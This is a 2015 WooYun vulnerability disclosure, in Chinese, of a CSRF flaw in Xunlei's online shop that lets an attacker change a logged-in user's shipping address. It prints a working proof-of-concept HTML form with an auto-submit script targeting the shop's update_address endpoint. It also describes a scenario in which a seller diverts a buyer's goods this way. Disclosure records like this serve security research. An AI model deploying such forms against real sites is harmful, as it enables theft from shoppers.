当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119794

漏洞标题:迅雷商场CSRF修改收货地址

相关厂商:迅雷

漏洞作者: 黑翼、

提交时间:2015-06-11 15:11

修复时间:2015-07-26 15:28

公开时间:2015-07-26 15:28

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-11: 厂商已经确认,细节仅向厂商公开
2015-06-21: 细节向核心白帽子及相关领域专家公开
2015-07-01: 细节向普通白帽子公开
2015-07-11: 细节向实习白帽子公开
2015-07-26: 细节向公众公开

简要描述:

迅雷商场CSRF修改收货地址

详细说明:

迅雷商场CSRF修改收货地址
编辑收货地址-抓包
<img src="https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201506/11150322a9a553f19ca741a105f5ef077ab64de3.png" alt="1.png"
post包:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://shop.xunlei.com/?controller=ajax&action=update_address" method="POST">
<input type="hidden" name="country" value="�#184;&#173;�#155;&#189;" />
<input type="hidden" name="province" value="1" />
<input type="hidden" name="city" value="2" />
<input type="hidden" name="area" value="3" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="address" value="�#163;&#133;�#128;&#188;�#164;&#167;�#161;&#151;" />
<input type="hidden" name="accept&#95;name" value="�#142;&#139;�#135;&#175;�#188;&#166;" />
<input type="hidden" name="qq" value="" />
<input type="hidden" name="telephone" value="" />
<input type="hidden" name="mobile" value="13854525452" />
<input type="hidden" name="id" value="134174" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


=====================
构造表单:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://shop.xunlei.com/?controller=ajax&action=update_address" method="POST">
<input type="hidden" name="country" value="火星" />
<input type="hidden" name="province" value="1" />
<input type="hidden" name="city" value="2" />
<input type="hidden" name="area" value="3" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="address" value="装逼大街天桥底下" />
<input type="hidden" name="accept&#95;name" value="王凯伦大黑阔" />
<input type="hidden" name="qq" value="" />
<input type="hidden" name="telephone" value="" />
<input type="hidden" name="mobile" value="13854525452" />
<input type="hidden" name="id" value="134174" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
document.forms[0].submit();
</script>
</html>


测试:

2.png


漏洞证明:

上面已经很清楚了!
别跟我说CSRF鸡肋-_-,迅雷这么大的厂商这用户量你懂得!如果我把洞给卖家,我看了一下迅雷商场是qq交谈来交易的.如果卖家在买家下单之前发个链接改了收货地址呢 然后买家买的东西就莫名其妙的飞了!
求审核通过(*^__^*)
毕竟CSRF是苏醒的巨人!

修复方案:

你们更专业

版权声明:转载请注明来源 黑翼、@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-11 15:27

厂商回复:

感谢反馈!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-11 15:21 | 黑翼、 ( 路人 | Rank:26 漏洞数:10 | o(∩_∩)o)

    晕死 刚才着急发错了 居然秒审核 不能重新编辑吗? 重新编辑了是还要审核吗?  @xsser

  2. 2015-06-11 15:35 | 黑翼、 ( 路人 | Rank:26 漏洞数:10 | o(∩_∩)o)

    @迅雷 这你都看的明白 能让乌云的审核员改回来吗 强迫症